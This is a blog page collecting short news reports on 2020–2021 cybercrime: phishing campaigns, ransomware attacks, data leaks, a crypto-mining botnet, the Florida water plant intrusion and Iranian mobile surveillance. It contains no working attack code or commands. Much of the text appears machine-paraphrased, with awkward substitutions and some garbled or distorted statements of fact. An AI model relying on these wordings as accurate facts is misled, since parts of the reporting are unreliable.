Search This Blog

Showing posts with label Cyber Crime. Show all posts

Turkey Dog Activity Continues to use COVID Lures

 

A year into the pandemic, Turkey Dog-related activity is ongoing with campaigns that keep on utilizing the "free internet" lures. These current campaigns use lure pages that guarantee cash payments of thousands of Turkish Lira, implying to be attached to the Turkish government. For instance, as indicated by Google Translate, a page states, "Final Phase Pandemic Support Application - 3,000TL State Support for All Applicants!" Another highlights a picture of Turkish Minister of Health Dr. Fahrettin Koca's and guarantees 1,000 lira for "everybody applying!" 

A portion of the lure pages, use whos.amung.us scripts for tracking purposes. RiskIQ's Internet Intelligence Graph, utilizes unique identifiers associated with these scripts to associate numerous Turkey Dog domains. For example, a RiskIQ crawl of pandemidesteklerim[.]com noticed the whos.amung.us ID loaded on the page, which was seen on 431 hosts since April 26, 2020. They additionally found a Google Analytics tracking ID associated with 52 Turkey Dog domains since October 25, 2020. 

In May 2020, threat researcher BushidoToken created a blog pulling together multiple indicators, some showing up as early as April 2020, from researchers following Cerberus and Anubis activity targeting Turkish speakers. These two remote access Trojans (RATs), which follow a malware-as-a-service model, steal client credentials to access bank accounts. Profoundly beguiling, they can overlay over other applications (dynamic overlays), capture keystrokes, SMS harvest and send, call forward, and access other sensitive information across the gadget. 

RiskIQ regularly crawls malignant app circulation URLs dependent on different internal and external feeds, they can directly notice the lure pages utilized by noxious Android applications. The mobile application landscape is likely overflowing with Turkey Dog mobile applications. A quick search for blacklisted samples of one known Turkey Dog APK, "edestek.apk" yields 90 outcomes from as many unique Turkey Dog URLs. Every one of the 90 of these samples can read, receive, and send SMS messages, allowing them to circumvent SMS two-factor authentication. Large numbers of them can likewise record audio, perform full-screen overlays to introduce a bogus login page for harvesting banking credentials, and download additional software packages.

After a year, cybercriminals keep on utilizing the COVID-19 pandemic as a lure for victims. Turkey Dog activity has gone on unabated for quite a long time, likely guaranteeing a huge gathering of victims and isolating them from their banking login credentials and other sensitive information.

Private Information of 50,000 French Healthcare Workers Stolen

 


French authorities unearthed a glut of stolen credentials on the dark web, apparently belonging to the healthcare workers. The authorities have alerted the healthcare department and advised them to remain vigilant. In recent weeks, threat actors have attacked several French hospitals – including hospitals in Dax and Villefranche-sur-Saone.

The French Ministry of Social Affairs and Health issued an alert this week stating, France Computer Emergency Response Team notified our department regarding the sale of a list of 50,000 user accounts on a cybercriminal platform which includes login/password credentials apparently belonging to French healthcare workers. 

The alert notes that “it is difficult to accurately describe the origin of this leak, but the impact that the use of login/agent password couples can have on the security of institutions’ information systems is more easily valuable. That includes attempts to connect to remote means of access, such as Outlook web access and VPN. Once the connection is successful, attackers can use all the resources allocated to the compromised account to break into the information system.”

The French health ministry also admitted that several healthcare facilities in the nation have been attacked by malware involving Emotet, TrickBot, and Ryuk and while explaining the same, it said that “particular attention should be paid to this because these three malwares are used in complex chains of attacks that have a strong impact on the activity of victims. Scan campaigns from the infrastructure of the TA505 (Clop ransomware activity cluster) and UNC1878 (Ryuk ransomware activity cluster) targeting health facilities were also reported.”

Mutuelle Nationale des Hospitaliers (MNH), the latest victim of a ransomware attack stated, “we spotted an intrusion into our data system on February 5 and our cybersecurity team quickly determined the potency of the cyber-attack. The computer systems were taken offline to negate the spread of the virus and to shield the personal information of our members, staff, and our partners.”

Threat actors are using the same tactics of attacking the healthcare department in France and other nations as well. For instance, last week in South Korea threat actors attempted to steal Covid-19 vaccine and treatment data from pharmaceutical maker Pfizer.

A Crypto Mining Botnet is Abusing Bitcoin Blockchains

 

Security experts from Akamai have detected another botnet utilized for illegal cryptocurrency mining exercises that are abusing Bitcoin (BTC) transactions to remain under the radar. This procedure permits botnet operators to make their infrastructure resilient to takedown led by law enforcement. 

“A recent piece of malware from a known crypto mining botnet campaign has started leveraging Bitcoin blockchain transactions in order to hide its backup C2 IP address. It’s a simple, yet effective, way to defeat takedown attempts.” reads the post published by Akamai. “Recent infection attempts against Akamai SIRT’s custom honeypots uncovered an interesting means of obfuscating command and control (C2) infrastructure information. The operators of a long-running crypto-mining botnet campaign began creatively disguising their backup C2 IP address on the Bitcoin blockchain.” 

The infection chain starts the exploitation of Remote Code Execution (RCE) vulnerabilities affecting Hadoop Yarn, Elasticsearch (CVE-2015-1427), and ThinkPHP (CVE-2019-9082). Botnet operators utilized Redis server scanners to discover installs that could be undermined to mine cryptocurrencies. The experts assessed that botnet operators have mined more than $30,000 in Monero in public pools since 2018. Experts distinguished various variations over time, using different techniques and tools. 

The more seasoned variants were utilizing a shell script to do the main functions, for example, disabling security features, killing off competing infections, establishing persistence, and in some cases, propagating within the compromised network. Newer variations of the shell script leverage binary payloads for handling more system interactions, like killing off competition, disabling security features, modifying SSH keys, downloading, and starting the miners. Botnet operators use cron jobs and rootkits to accomplish persistence and re-infect with the most recent rendition of the malware. 

In December 2020, the researchers found a BTC wallet address that was included in new variations of the miner, alongside a URL for a wallet-checking API and bash one-liners. The experts found that the wallet information was being fetched by the API and used to figure an IP address used to maintain persistence. By fetching addresses through the wallet API, botnet operators are able to obfuscate and backup configuration data on the blockchain. Experts noticed that by pushing a modest quantity of BTC into the wallet, operators can recuperate infected systems that have been orphaned.

Malwarebytes Report Confirms the Change in Tactics of Cybercriminals During Covid-19

 

Malwarebytes, an American security firm announced the findings of its annual ‘State of Malware’ report, this report explored the working methodology of employees and cybercriminals. Work from home was the new normal during the Covid-19 pandemic wherein many companies altered their working methodology and started working remotely.

The notable change was in the working methodology of the threat actors, they were more focused on gathering intelligence, and exploiting and preying upon fears with targeted and sophisticated assaults. Last year, threat actors targeted many high-profile firms and popular personalities which included hacking the accounts of famous personalities such as Barack Obama, Jeff Bezos, and Elon Musk; attacking FireEye and SolarWinds via supply chain and the Marriott hotel which recorded theft of the records of 5.2 million guests.

Marcin Kleczynski, CEO of Malwarebytes stated, “this past year has taught us that cybercriminals are increasingly formidable, planning long-term, strategic, and focused attacks that are sometimes years in the making. 2020 continued to show us that no company is immune, and there is no such thing as ‘safe enough’.”

“The COVID-19 pandemic compounded this with new challenges in securing remote workforces, making it essential that we quickly become more adaptable and learn how to better protect workers in any environment. While our total detections are down this year, we must remain vigilant. The threats we are seeing are more refined and damaging than ever before”, he further added.

Last year, Malwarebytes observed an overall drop of 24 percent of Windows detections across businesses and an 11 percent drop for clients. In total, there was a 12 percent drop in Windows detections across the board. However, Mac detections for businesses surged to 31 percent, 2020 also witnessed the growth of Android malware called FakeAdsBlock, which produced an alarming number of non-stop ads, accounting for 80,654 detections.

HiddenAds was discovered to be the most common mobile adware application, this trojan attacks users with ads, and nearly 704,418 malicious activities were reported with an increase of nearly 150 percent year-over-year.

Chinese Hackers Cloned Exploit Tool Belonging to NSA

 

A Chinese hacking group allegedly "cloned" and deployed a zero-day exploit created by the U.S. National Security Agency's Equation Group before Microsoft fixed the Windows vulnerability that was being misused in 2017, as indicated by an analysis published on Monday by Check Point Research. For quite a long while, researchers had presumed the Chinese hacking group known as APT31 or Zirconium had built up an exploit tool to take advantage of a vulnerability tracked as CVE-2017-0005 and found in more seasoned renditions of Windows, like Windows 7 and Windows 8, as indicated by the report. 

The report brings up additional questions about how some of the NSA's most valued cyberweapons have been found or stolen by nation-state hacking groups and then turned on their developers over the years. In May 2019, Symantec published a similar report that found another group of hackers had taken and exploited cyber tools developed by the NSA. Both the Symantec and Check Point research show that the burglary of NSA Equation Group devices by these groups seems to have occurred before the hacking group known as the Shadow Brokers first began publishing the agency's exploits in 2016. 

Security research previously noted that a zero-day exploit was created for CVE-2017-0005, called "Jian," in 2014 and initially deployed it in 2015. The exploit was utilized for a very long time before Microsoft at last issued a patch for it in 2017. Whenever exploited, this bug could permit an attacker to escalate privileges inside an undermined device and afterward acquire full control, the researchers note. Microsoft published its fix for CVE-2017-0005 in March 2017, when the company was forced to issue multiple fixes for the exploits related to the Shadow Brokers "Lost in Translation" leak, Check Point notes. 

A further investigation by Check Point found that Jian was not an original creation, but rather a clone of a zero-day exploit for more seasoned renditions of Windows created by the NSA Equation Group in 2013 and initially called "EpMe" by the agency, as per the new report. 

 In another case documented by Symantec in 2019, APT3 "Buckeye" was connected to assaults utilizing Equation Group tools in 2016, before the Shadow Brokers leak.

Sequoia Capital Told Investors it was Hacked

 

Sequoia Capital told its investors on Friday that some personal and financial data may have been accessed by a third party after one of its employees succumbed to a successful phishing assault, as per a report of Axios. Sequoia Capital is one of Silicon Valley's most seasoned and most successful venture capital firms with more than $38 billion in assets under management, as per Pitchbook data. The 49-year-old venture capital firm has invested in organizations like Airbnb, DoorDash, and 23andMe. It has likewise put resources into cybersecurity organizations like FireEye and Carbon Black, as indicated by its site. 

Sequoia was established by Don Valentine in 1972 in Menlo Park, California. During the 1990s, Valentine gave control of the organization to Doug Leone and Michael Moritz. In 1999, Sequoia extended its tasks to Israel. Sequoia Capital China was set up in 2005 as an offshoot to the U.S. firm. The organization is driven by Neil Shen. In 2006, Sequoia Capital procured Westbridge Capital Partners, an Indian venture capital firm. It later was renamed Sequoia Capital India. CB Insights perceived Sequoia Capital as the main funding firm in 2013. The U.S. firm had 11 accomplices as of 2016.

Sequoia told investors that it has not yet seen any sign that undermined data is being exchanged or in any case misused on the dark web, Axios reported. A Sequoia representative affirmed on Saturday that it had "recently experienced a cybersecurity incident" that its security team was investigating. It had additionally notified law enforcement and was working with outside cybersecurity experts, the firm said.

A Sequoia spokesperson said, "We recently experienced a cybersecurity incident. Our security team responded promptly to investigate, and we contacted law enforcement and engaged leading outside cybersecurity experts to help remediate the issue and maintain the ongoing security of our systems." He also said, "We regret that this incident has occurred and have notified affected individuals. We have made considerable investments in security and will continue to do so as we work to address constantly evolving cyber threats."

It doesn't create the impression that the hack was associated with the Solarwinds assaults, which incorporated a bigger breach of FireEye and has affected government agencies and large technology companies like Microsoft.

CLoP Hacker Group Purloined Data From Jones Day

 

A dispute has broken out over the provenance of stolen information between US law firm Jones Day and the CLoP ransomware group after some of the association's assets were leaked on the dark web. The hacker group CLoP has posted a huge tranche of stolen records to a dark web “leak site,” asserting it snatched them from the law firm during a recent cyberattack. Such sites are regularly utilized by hackers to goad a victim into paying a ransom. CLoP's site is freely accessible and was verified for its existence.

In correspondence with the Wall Street Journal, the CLoP gang professed to have acquired more than 100GB of material directly from Jones Day's servers and said it previously contacted the firm with ransom demands on 3 February 2021. Jones Day has not engaged with the gang, hence the leak. In any case, the WSJ proceeded to report that Jones Day – which is among various law firms scrutinized for its connections to previous president Trump – has denied its organization was breached and demands that the information was stolen in a supply chain attack on Accellion’s legacy file transfer product, FTA, which was publicly disclosed in January 2021. 

Accellion was first informed regarding a zero-day vulnerability in its FTA product – which is quickly moving toward end-of-life – in December 2020. It released a patch within 72 hours, but the initial incident turned out to be just the first of a series of exploits used to attack its service over the following weeks. “Our latest release of FTA has addressed all known vulnerabilities at this time,” said Accellion CISO Frank Balonis. “Future exploits, however, are a constant threat. We have encouraged all FTA customers to migrate to kiteworks for the last three years and have accelerated our FTA end-of-life plans in light of these attacks.

“Emsisoft's Brett Callow said: “If CLoP published Jones Day’s data and Jones Day says the data leaked a result of the attack on Accellion, the logical conclusion would be that CLoP was responsible for that attack – and that means they may have data relating to other Accellion customers.”

“LinkedIn Private Shared Document” Shared Via Phishing Email by Hackers

 

LinkedIn seems to have become a popular destination for phishing attacks and users have been attacked with phishing emails in the recent scam on the site. With the public becoming more familiar with the standard tactics used to attack them, cybercriminals had to adopt new tactics in order to prevent identification. 

JB Bowers, a security investigator, found that hackers use LinkedIn to target users to give up their login credentials. The scheme attempts to get dubious users to open a "LinkedIn Private Shared Document," after which their login credentials are requested to access the falsified LinkedIn page. The message prompts the receiver to follow a reference from a third party to access a document.

Any user who obtains an unwanted message through the internal messaging system of LinkedIn via an unidentified contact must be extremely careful. In particular, this is true if users are requested to enter their login details. Users who mistakenly input their login credentials could often receive phishing messages which their LinkedIn contacts can also see. 

As to why hackers attack LinkedIn users, it may be because regular LinkedIn users have strong revenue than normal and are perceived as higher-value targets. Or since LinkedIn links to another Microsoft service, such as Office 365, it could contribute to more identity leakage if a LinkedIn account is hacked. As the name suggests, Phishing attempts to lure users to send confidential details. This could take the form of emails offering a free smartphone or something more formal, as in the aforementioned case. Further targets of phishing attacks are- colleges and businesses. Hackers are now getting more advanced and will send you a bogus email that appears to have originated from your employers since LinkedIn tells them who you are dealing with. Phishing pages are hosted in sites where there are also legitimate business purposes, such as Firebase and Pantheon.io, making access by companies unlikely. 

“The sites use major ASNs including Fastly, Google, and Microsoft, making basic network traffic analysis for the end-user also not so useful,” Bowers stated.

Employees must be advised to identify this form of intrusion leading to a broader breach of enterprise processes and networks. A further alternative is to block the usage of social media/networks on working devices, but it might not be good for workers. The victims will be made aware of the deception and have to let their LinkedIn friends also know about it. In some instances, some of them will find themselves fooled and have to go through the same method. 

“If you see any more LinkedIn messages like this […] you’ll want to let that person know out of band that their account has been compromised and that they should update their LinkedIn password, as well as report the abuse to LinkedIn,” Bowers advised.

Masslogger Campaigns Exfiltrates Clients Credentials

 

Assailants are continually reinventing approaches to monetize their tools. Cisco Talos as of late found an intriguing campaign affecting Windows systems and focusing on clients in Turkey, Latvia, and Italy, albeit similar campaigns by the same actor have likewise been focusing on clients in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October and November 2020. The threat actor utilizes a multi-modular approach that begins with the underlying phishing email and carries through to the final payload. The adversaries behind this campaign likely do this to evade detection. However, it can likewise be a shortcoming, as there are a lot of chances for defenders to break the kill chain. 

Conveyed through phishing emails, the Masslogger trojan's most recent variation is contained inside a multi-volume RAR archive using the .chm file format and .r00 extensions, said Switchzilla's security research arm. Cisco Talos added: “Masslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP protocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is done through the Masslogger control panel web application.” 

CHM is an arranged HTML file that contains an embedded HTML file with JavaScript code to start the active infection process. Each phase of the infection is obfuscated to avoid detection using simple signatures. The subsequent stage is a PowerShell script that eventually deobfuscates into a downloader and downloads and loads the main PowerShell loader. The Masslogger loaders appear to be facilitated on undermined authentic hosts with a filename containing one letter and one number linked with the filename extension .jpg. For instance, "D9.jpg". 

Masslogger is not an entirely new creation of the malware industry: Talos highlighted research by infosec chap Fred HK. He ascribed it to a malware underground persona who goes by the handle of NYANxCAT. Costs for Masslogger were apparently $30 for three months or $50 for a lifetime license. Cisco's analysis showed that Masslogger “is almost entirely executed and present only in memory” with just the email attachment and the HTML help file.

Ukrainian police arrested members of a well-known cyber ransomware group

Members of the Egregor group, which provides the service using the Ransomware-as-a-Service (RaaS) model, have been arrested by the Ukrainian police.

The arrest is the result of a joint operation of the French and Ukrainian law enforcement systems. The names of the arrested citizens were not disclosed, but it is known that they provided logistical and financial support for the service.

It is worth noting that this ransomware has been active since the fall of 2020 and works according to the Ransomware-as-a-Service (RaaS) model. That is, the authors of the malware rent it out to other criminals, who are already hacking companies, stealing data, encrypting files, and then demanding a “double ransom” from victims (for decrypting files, as well as for not disclosing the data stolen in the process of hacking).

If the victims pay a ransom, the group that organized the hack keeps most of the funds, and the developers of Egregor receive only a small share. The attackers laundered funds through the Bitcoin cryptocurrency.

Those arrested are suspected, among other things, of providing such financial schemes.

According to Allan Liska, a cybersecurity researcher at Recorded Future, Recorded Future has discovered that the Egregor infrastructure, including the site and the management and control infrastructure, has been offline since at least Friday (February 12).

The French side joined the investigation after the Egregor software was used in attacks on the computer game developer Ubisoft and the logistics organization Gefco in 2020.

Although the Egregor system based on the RaaS model was launched in September 2020, a number of cybersecurity experts believe that the service operators are the well-known cyber ransomware group Maze.

Lithuanian Police Investigate Leak of 110,000 User Records of CityBee

 

Police in Lithuania is investigating after the personal information of 110,000 individuals was leaked to an online hacker site. The car-sharing service, CityBee, affirmed the records and data of thousands of its clients had been undermined in the incident. The first part of the database was posted on February 15 and incorporates 110,000 CityBee client IDs, usernames, hashed passwords, complete names, as well as personal codes (national identification numbers) that belong to mostly Lithuanian CityBee users. The subsequent part, posted on February 16 by the same threat actor, seems to contain more definite personal data, possibly including driver license numbers and CityBee credit limits, as well as a folder named “CreditCards.” 

While the proprietor of the post at first guaranteed that the information had been stolen from CityBee at some point in 2020, it was subsequently affirmed that the database was exfiltrated from an unsecured Microsoft Azure blob managed by CityBee at least from February 2018. Apparently, a Rapid7 Open Data Forward DNS tool was utilized to look through the reverse DNS lookup, which was how the threat actor found the unsecured CityBee blob. At that point, a directory brute-force attack was used to enumerate directories in the blob, after which the threat actor downloaded the files. 

“The data, which was uploaded to one of the cyber hackers favourite forums, is three years old,” CityBee said in a statement. A poster on the hacker forum said the rundown was extricated from data grabbed on February 2018 from an unsecured database backup and offered full hacked information for $1,000 paid in Bitcoin. Disclosure of stolen client information won't influence the security of CityBee client financial services, as the organization doesn't gather delicate data identified with client payment methods. 

“We are very sorry. I am one of the victims of the leak because I use the service, and I very well understand that feeling of insecurity,” CityBee CEO Kristijonas Kaikaris told journalists on Tuesday. He proposed the hacked clients “don’t panic” and change their passwords. The organization risks a fine of as much as 20 million euros ($24.21 million), or 4% of its turnover if found in breach of regulations.

US court sentenced Ukrainian to seven years in prison for electronic fraud

A court in the United States has sentenced Ukrainian citizen Alexander Musienko to more than seven years in prison for participating in an online money-laundering scheme that legalized millions of dollars.

The suspect admitted his guilt in electronic fraud. On February 11, the court sentenced him to 87 months in prison (more than seven years). In addition, a citizen of Ukraine is obliged to pay more than $98.7 thousand in compensation.

As follows from the materials of the case, from 2009 to 2012, the 38-year-old Alexander Musienko from Odessa collaborated with computer hackers from Eastern Europe in order to get more than $3 million from the bank accounts of American companies. These funds were eventually stolen and legalized using bank accounts abroad.

According to the U.S. Department of Justice, he legalized funds stolen by hackers in the United States. This task was entrusted to private individuals whom Musienko hired by fraud to perform the duties of financial assistants. They transferred the stolen funds to their bank accounts at the agreed time and immediately transferred them to third-party accounts registered outside the United States.

So, in September 2011, Musienko's financial assistants, who were sure that they were working for a legitimate business, hacked the online accounts of the North Carolina company and transferred a total of almost $296.3 thousand to two bank accounts controlled by Musienko.

The Department added that Musienko was arrested in South Korea in 2018 and extradited to the United States in 2019. Around April 2019, the FBI investigated the information on Musienko's laptop. As a result, files containing about 120 thousand payment card numbers and associated identification information were found.

Ukraine’s PrivatBank Database for Sale on a Hacking Forum

 

PrivatBank is the biggest commercial bank in Ukraine, as far as the number of customers, assets value, loan portfolio, and taxes paid to the national budget are considered. Headquartered in Dnipro, in central Ukraine, the bank was nationalized by the government of Ukraine to ensure its 20 million clients and to preserve "financial stability in the country", on 18 December 2016. 

As per their site, PrivatBank's net profit for 2020 was 25.3 billion UAH, which is around $910 million. The database is said to contain 40 million records of customers such as full name, DOB, taxpayer identification number, place of birth, passport details, family status, etc. 

Ukraine has a population of 44 million, and the database’s 40 million records would cover 93% of the population. In any case, it isn't evident whether these are unique records, and it would be improbable that PrivatBank has records of 93% of Ukraine's population, considering ages that wouldn't have bank accounts. 

The threat actor is asking $3,400 in bitcoin for the release of the database. At the point when CyberNews took a gander at the bitcoin address provided, it gives the idea that nobody has purchased the database yet from that specific wallet. However, it is additionally conceivable that the threat actor is generating another wallet for each sale, a process that can be done automatically.

In 2016, hackers allegedly took $10 million from the bank through a loophole in the SWIFT international banking system. Before then, in 2014, the pro-Russian hacker group CyberBerkut asserted credit for hacking into the bank and mining client information, and afterward publishing the information on the Russian social media platform VKontakte. This was obvious retaliation for a PrivatBank accomplice who offered a $10,000 bounty for capturing Russian-backed militants in Ukraine. Earlier in 2014, another group named Green Dragon asserted credit for a DDoS assault on PrivatBank and guaranteed it got to client information during the assault. 

A 2018 report by a US corporate investigations company stated that “PrivatBank was subjected to a large scale and coordinated fraud over at least a ten-year period ending December 2016, which resulted in the Bank suffering a loss of at least USD 5.5 billion.”

Hacker Attacked a Water Plant in Florida

 

A hacker penetrated computer networks at Oldsmar, Florida, water treatment plant, remotely delivering a 100-fold boost in a chemical that is exceptionally perilous in concentrated sums. In an assault with the possibility to harm public health, the hacker on February 5 accessed a city computer and changed the level of sodium hydroxide which is utilized to eliminate metals and control acidity, from 100 parts for each million to 11,100 parts for every million, as per Bob Gualtieri, who serves as the sheriff of Pinellas County. 

This is a “significant and potentially dangerous increase,” Gualtieri said at a Monday press conference. The attacker momentarily entered the computer system at 8 a.m. on Feb. 5, before leaving and returning at about 1:30 p.m. for roughly three to five minutes, Gualtieri said. In that window, the operator of the water plant could see the attacker on screen, “with the mouse being moved about to open various software functions that control the water being treated in the system,” Gualtieri said. 

When the hacker left the computer system, the operator whose computer was remotely taken over promptly brought down the level of the chemical, otherwise called lye. This move forestalled any harm to people in general and the drinking water, Gualtieri said. He said there were extra counteraction measures inside the water system that would have kept polluted water from reaching the public. It isn't yet known whether the break originated from the U.S., or outside of the country, Gualtieri said. Oldsmar, with a population of almost 15,000, is situated around 15 miles northwest of Tampa.

“Many of the victims appear to have been selected arbitrarily, such as small critical infrastructure asset owners and operators who serve a limited population set,” said Daniel Kapellmann Zafra, manager of analysis at Mandiant Threat Intelligence. Through “remote interaction with these systems,” the hackers have engaged in “limited-impact operations.” None of those examples brought about any damage to individuals or infrastructure, Zafra said. “We believe that the increasing interest of low sophisticated actors in industrial control systems is the result of the increased availability of tools and resources that allow malicious actors to learn about interactions with these systems,” he added.

Developer of Cyberpunk 2077 Hit by Ransomware Attack

 

Ransomware turned into an inexorably critical danger all through 2020, as hackers continued to target hospitals and health care providers amid pandemic. A more modest pattern has additionally been brewing in the course of the most recent couple of months, with a rash of assaults on computer game organizations including big names like Ubisoft, Capcom, and Crytek. Presently the developer CD Projekt Red, which released the censured blockbuster Cyberpunk 2077 in December, is the most recent target. 

On Tuesday, CD Projekt Red uncovered that it had been the victim of a ransomware assault. “Some of our internal systems have been compromised,” the organization said in a statement presented on Twitter. The assailants encrypted a few PCs and took the information, however CD Projekt Red said it would not pay the ransom and that it was re-establishing its systems from backups. The incident comes as CD Projekt Red faced a long time of sustained criticism for its bug-ridden, overhyped Cyberpunk 2077 release. The game had numerous performance issues on various platforms, that is why Sony pulled it from the PlayStation Store and, alongside Microsoft, offered refunds to players. 

Despite the organization's recuperation efforts, it still faces potential fallout. The assailants obviously took source code for Cyberpunk 2077 as well as other CD Projekt Red games like Witcher 3, an unreleased version of Witcher 3, and Gwent, the digital Witcher card game. The assailants likewise say they took business data like investor relations, human resources, and accounting data. CD Projekt Red says there is no proof that client information was undermined in the breach.

“If we will not come to an agreement, then your source code will be sold or leaked online and your documents will be sent to our contacts in gaming journalism,” the attackers said in their ransom note. 

CD Projekt Red has released patches for Cyberpunk 2077 trying to improve the game's stability and do damage control. Yet, the organization faces a lawsuit from investors, accusing that it forced developers to work unreasonably overtime to finish the game, and criticism about its use of nondisclosure agreements to keep journalists from reporting accurately on the game's shortcomings prior to release.

Domestic Kitten - An Iranian Surveillance Operation

 

Check Point researchers as of late revealed the full degree of Domestic Kitten's broad surveillance operation against Iranian residents that could pose a threat to the security of the Iranian system. The actual operation is linked to the Iranian government and executed by APT-C-50. Started in 2017, this operation comprised 10 unique campaigns, targeted more than 1,200 people with more than 600 effective infections. It incorporates 4 currently active campaigns, the latest of which started in November 2020. In these campaigns, victims are tricked to install a malicious application by various vectors, including an Iranian blog website, Telegram channels, and even by SMS with a link to the noxious application. 

The victims incorporate prominent scholastics, activists and business pioneers in Iran and elsewhere, and government authorities in the United States and Europe, researchers at Israeli cybersecurity firm Check Point said in a couple of reports released on Monday. 

The APT uses versatile malware called FurBall. The malware depends on commercially-available monitoring software called KidLogger, and as indicated by the researchers, "it seems that the developers either obtained the KidLogger source code or reverse-engineered a sample and stripped all extraneous parts, then added more capabilities." FurBall is spread through an assortment of assault vectors including phishing, Iranian sites, Telegram channels, and employing SMS messages containing a link to the malware. The malware uses an assortment of disguises to attempt to fool a victim into the installation, for example, being packaged as "VIPRE" mobile security, masquerading as a news outlet app, acting as repackaged legitimate mobile games found on Google Play, app stores, restaurant services, and wallpaper applications. 

When installed on a target device, FurBall can intercept SMS messages, get call logs, gather device information, record communication, steal media and stored files, monitor device GPS coordinates and so track their target's movements, and more. At the point when data has been accumulated from the compromised device, it very well may be sent to command-and-control (C2) servers that have been utilized by Domestic Kitten since 2018. Linked IP addresses were found in Iran, in both Tehran and Karaj.  

On Monday, Check Point researchers, along with SafeBreach, additionally uncovered the activities of a subsequent danger group that is effectively focusing on Iranian dissidents but rather than focus on their smartphones, their PCs are at risk.

Microsoft Office Phishing Attack Hosted on Google Firebase

 

A phishing campaign set on stealing Microsoft login credentials is utilizing Google Firebase to bypass email security efforts in Microsoft Office 365, researchers said. 

Researchers at Armorblox revealed invoice-themed emails sent off to at least 20,000 mailboxes that indicate to share data about an electronic funds transfer (EFT) payment. The emails convey a genuinely vanilla subject line, “TRANSFER OF PAYMENT NOTICE FOR INVOICE,” and contain a link to download an “invoice” from the cloud.

Clicking on that link starts a progression of redirects that at last takes targets to a page with Microsoft Office branding that is facilitated on Google Firebase. That page is obviously a phishing page, designed to collect Microsoft log in data, secondary email addresses, and phone numbers. “Since all workplace accounts are so closely interlinked, sharing credentials to one of your accounts can prove to be very dangerous as cybercriminals send emails in your name to trick your customers, partners, acquaintances and family members,” as indicated by Armorblox. 

Impersonating Microsoft to phish for account credentials continues being an incredible method since it's a way for attackers to embed themselves into typical business work processes, said Rajat Upadhyaya, head of engineering at Armorblox. “Viewing documents via Office 365 is something we do every day, so victims might think it’s not unusual to enter login credentials in this situation,” Upadhyaya added. “Plus, hosting the final phishing page on Google Firebase lends the domain inherent legitimacy and allows it to bypass email security blocklists and filters.” 

The email assault bypassed native Microsoft email security controls. Microsoft appointed a Spam Confidence Level (SCL) of '1' to this email, which implies that the tech giant didn't decide the email as dubious and conveyed it to end-user mailboxes. Strangely, by facilitating the phishing page HTML on Google Firebase, an inherently trusted domain, the emails had the option to nip past underlying Microsoft security filters, including Exchange Online Protection (EOP) and Microsoft Defender for Office 365.

For better protection against email-borne threats, employees ought to be prepared to engage with emails identified with cash and information with an "eye test" that incorporates investigating the sender name, sender email address, language inside the email, and any legitimate irregularities inside the email, as per Armorblox.

Serco Affirms Babuk Ransomware Attack

 

Outsourcing giant Serco has affirmed that parts of its infrastructure in mainland Europe have been hit by a double extortion ransomware assault from the new Babuk group, however, the parts of its operation relating to the NHS Test and Trace program are unaffected. “Serco’s mainland European business has been subject to a cyber-attack,” a Serco representative said. “The attack was isolated to our continental European business, which accounts for less than 3% of our overall business. It has not impacted our other business or operations.” 

The incident comes after security firms and insurers progressively have stressed that digital extortionists gain from other assailants' techniques, outsource a portion of their operations and depend on connections to infiltrate victim networks. Albeit the NHS Test and Trace program was unaffected by the incident, ThreatConnect EMEA vice-president Miles Tappin said the vulnerabilities in Serco's wider systems were of incredible concern, and the Babuk assault uncovered “inherent weaknesses of the system”. 

“Like many actors new to the world of ransomware, the actor behind Babuk ransomware has been learning on the job while drawing insights from other criminal groups,” said Allan Liska, an intelligence analyst at the threat intelligence company Recorded Future. In the ransom note, Babuk's operators professed to have approached Serco's systems for three weeks and to have as of now exfiltrated a terabyte of information. The cybercriminals made explicit references to Serco partners, including Nato and the Belgian Army, and threatened Serco with consequences under the General Data Protection Regulation (GDPR). 

The attacker has demanded $60,000 to $85,000 in ransoms, however, that is “likely to increase over time as the threat actor becomes more experienced in ransomware operations,” as indicated by a private analysis from PricewaterhouseCoopers got by CyberScoop. Babuk is a long way from sophistication. Its code has contained mistakes that held it back from executing on some targeted computers, as indicated by PwC. “We assess that, due to a disregard for error checking, Babuk would fail to execute altogether in some environments,” the analysis says. 

However, while Babuk is as yet a moderately low-level threat to associations, as indicated by Liska, that could change on the off chance that they can bring in more cash from assaults and put resources into new capabilities.

Fraudsters are Using Fake W-8BEN Forms for 2021 Tax Season

 

A huge number of US citizens get ready for the 2021 tax season, swarms of fraudsters and scammers are getting ready to rip off residents and non-residents alike. Fraudsters had a promising beginning foreseeing the buzz encompassing tax filing season, with phishing efforts impersonating the government agency as early as November 25, 2020, as indicated by Bitdefender Antispam Lab. Spikes in IRS-related phishing tricks scams were seen on January 19 and 21 when a large portion of the incoming agency-related correspondence was set apart as spam. 

Authorities say a huge number of individuals—from regular residents to sophisticated professionals—fall prey to IRS and other scams every year, losing millions of dollars in the process. As per a Federal Trade Commission (FTC) report, imposter scams cost Americans some $667 million in 2019—and those were only the cases reported to authorities. Numerous victims never document reports, regularly out of shame.

This warm-up was no happenstance, since the 2020 fiscal year rounded up, round about $2.3 billion were involved in tax fraud, as indicated by the agency’s annual report. Identity thieves utilized stolen Social Security numbers and other personally identifiable information (PII) to file early tax returns in the name of legitimate taxpayers, or utilized frivolous tactics to startle recipients into making prompt payments to stay away from arrest or deportation. 

Fraudsters are focusing on non-residents in the US utilizing a phony variant of the W-8BEN Form (Certificate of Foreign Status of Beneficial Owner for United States Tax Withholding and Reporting) to steal sensitive information. This rendition of the scam has been spotted more than 80,000 times since November 25, 2020, with more recognizable spikes expected to hit inboxes until April 15. Unlike traditional phishing, which expects recipients to get to a spoofed website or download a malicious attachment, scammers have set up a phony fax number where recipients should forward their data. The fake version will advise you to give specific data excluded from the genuine W-8BEN US tax exemption document, for example, your passport number, profession, mother's maiden name, bank account name and number and investments. 

Fraudsters have additionally reused older renditions of IRS impersonation scams by utilizing the Economic Impact Payments as a feature of The Coronavirus Aid Relief, and Economic Security (CARES) Act.

Outdated Magneto 1 Witnessed Credit Card Skimming Threats

 

Magento is an open-source code e-commerce site that supplies online traders with a scalable shopping cart system, and managing their online store's layout, content, and features. Lately, threat actors began leveraging a flaw in the ‘Magento 1’ branch that has not been managed any longer in the fall of 2020. 

